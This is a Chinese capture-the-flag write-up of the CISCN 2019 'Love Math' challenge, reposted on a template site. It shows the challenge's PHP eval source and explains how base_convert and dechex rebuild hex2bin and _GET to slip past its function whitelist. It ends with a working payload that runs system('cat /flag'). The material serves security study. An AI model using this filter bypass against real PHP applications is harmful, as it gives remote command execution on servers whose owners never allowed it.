buuctf [CISCN 2019 初赛]Love Math

这篇具有很好参考价值的文章主要介绍了buuctf [CISCN 2019 初赛]Love Math。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

这题主要利用了php的一些特性

  • 变量函数
  • 数字转字符串

源码

<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

该php的功能是数值计算,数值计算可以使用指定的php数学函数,数学函数由 http://www.w3school.com.cn/php/php_ref_math.asp这个链接的函数来指定

该题采用了黑名单和白名单的方式来过滤

思路

这里采用可变字符来执行函数

$_GET['a']($_GET['b'])

但是_GET会被白名单检测,这里需要绕过白名单
这里将 _GET16进制编码 得到5f474554
这样我们就可以通过 hex2bin"5f474554"转换为_GET

# dechex(1598506324) -> 5f474554
hex2bin(dechex(1598506324))

同样,hex2bin并不在白名单中,但是白名单中有一个函数可以利用,就是 base_convert

base_convert

base_convert(string $num, int $from_base, int $to_base): string

接收一个字符串数字,并且指定进制转换,from_baseto_base都只能在 2 和 36 之间(包括 2 和 36),高于十进制的数字用字母 a-z 表示
什么意思呢?
这里举个例子

echo base_convert('a37334', 16, 2);

这里16指示 a37334是一串16进制字符串,要转换为2进制
base_convert最高可以支持36进制,什么意思呢

10 -> a
11 -> b
12 -> c
...
17 -> h

一直到z
也就是说我们只需要在10进制转换成36进制得出hex2bin即可

base_convert('hex2bin',36,10);
base_convert(37907361743,10,36);

执行$_GET

$pi=base_convert(37907361743,10,36)(dechex(1598506324))  # _GET

$$g 代表 $_GET
由于 []被黑名单禁用,所以这里使用 {} 取键来执行(版本 < php8)

payload文章来源地址https://www.toymoban.com/news/detail-680763.html

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{0}($$pi{1})&0=system&1=cat /flag

到了这里,关于buuctf [CISCN 2019 初赛]Love Math的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [2022CISCN]初赛 复现

    刚开始直接提取usb键盘流量,发现导出有问题 键盘流量,搜索8个字节长度的数据包,这里也能发现版本有2.8.1和2.10.1两种,因此猜测需要分别导出 提取出两段数据   然后拿脚本去解键盘流量,分别得到数据如下 第一个数据用010保存16进制文件,得到一个rar文件 第二个数据

    2024年02月08日
    浏览(41)
  • [2022 CISCN]初赛 web题目复现

    源码泄露www.zip,用网上的链子直接打 考点: CVE-2022-1292 SSRF 项目分析 项目后端为python+go,其中python部署在外网,go通过python转发到内网 先看python,一共有四个路由: / 为主界面 /getcrt 生成一个x509证书 /createlink 调用c_rehash创建证书链接 /proxy 通过代理访问go内网服务 再来看g

    2023年04月12日
    浏览(30)
  • 全国大学生信息安全竞赛初赛writeup(历年CISCN真题与解析)

    收录了大佬们参加全国大学生信息安全竞赛初赛的writeup和真题环境,方便学习,排名不分先后,谨参考完整度和CSDN站内优先原则。 在此,对大佬们的分享表示由衷的敬意和诚挚的感谢! 第十二、十三届全国大学生信息安全竞赛——创新实践能力赛原题 如果遇到打不开的链

    2024年02月06日
    浏览(59)
  • 【网络安全CTF】BUUCTF(Basic篇)

    解题思路:已给用户名密码,直接用ssh工具连接即可获取flag 查找flag在跟下 提交完成。 访问链接:为php代码审计题,看题目要求构造GET请求读取文件 http://9a7d4988-99f9-4c29-88d8-600e19887723.node4.buuoj.cn:81/?file=/…/…/flag 访问链接:为uploab-labs靶场,这个共有20关过一关可获取flag。

    2024年02月13日
    浏览(39)
  • 全国大学生网络安全精英赛初赛(nisp一级)

    网络方面 。 1.FTP端口号21 Sftp指的是ssh文件传输协议默认端口号22. http端口号80 Https端口号443(http+ssl)(浏览器和服务器之间的加密协议) 发送邮件时,SMTP端口号是25,接收用到POP3技术。 共享文件夹端口445. 远程桌面端口3389 Telent

    2023年04月13日
    浏览(49)
  • 记首次参加网络安全比赛(初赛-知识竞赛,决赛-CTF夺旗赛-解题模式)

    网络安全相关的方向很多,几乎IT相关的安全内容都可以涵盖在内。笔者本身的知识体系更偏向于编程语言和Web应用,本次参赛可谓极具挑战,但是就是喜欢这种感觉:) 赛程安排 9月16日接到通知 9月26日初赛 10月15日决赛 初赛 网络安全的重要性不容置疑,借助比赛来增强网

    2024年02月16日
    浏览(43)
  • “技能兴鲁”职业技能大赛-网络安全赛项-学生组初赛 Crypto WP

    查看代码 考点:共模攻击 EXP 关注微信公众号“中学生CTF”,回复“开始游戏” 按要求回复相关内容分别获取公钥  密文 提示 私钥 公钥 密文 提示 私钥 EXP 查看代码 按加密顺序反解即可,需要注意的是base100表情符号之间的空格要去掉 EXP 查看代码 分析:flag分为了两段 part

    2024年02月05日
    浏览(40)
  • 2023年四川省网络与信息安全技能大赛初赛 个人赛 Writeup

    反序列化 、 eval截断 、 无参数RCE 然后在写入一个webshell反弹 webshell反弹之后在根目录下看到 secret.txt ,里面存着用户 boogipop 的密码 之后直接 cat /flag 就行 在源码中飞机爆炸处理之后有一个GET参数请求 直接传 scores 即可获得flag: /useful.php?scores=1000000000 给了源码,但是登录后

    2024年02月07日
    浏览(42)
  • [CTF/网络安全]BurpSuite爆破实战解题详析之BUUCTF Brute 1

    免责声明:本文仅分享AntSword渗透相关知识,不承担任何法律责任。 请读者自行安装BurpSuite,本文不再赘述。 在用户名和密码都未知的情况下,进行用户名、密码的组合爆破,效率极低。 先爆破用户名,再利用得到的用户名爆破密码,将提高爆破速度。 题目 操作 Burp抓包

    2024年02月06日
    浏览(50)
  • ciscn_2019_s_9

    32位,啥也没开,开心愉悦写shellcode 程序主要在这里,栈溢出,写shellcode进去然后执行,发现有个hint 这里有个jmp,ok好办了 思路 写shellcode,然后用jmp跳转到shellcode的头,然后执行shellcode 因为栈只有0x20大小,所以不能使用pwntools生成的shellcode 这个是0x17大小的shellcode,平时收

    2024年02月07日
    浏览(58)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包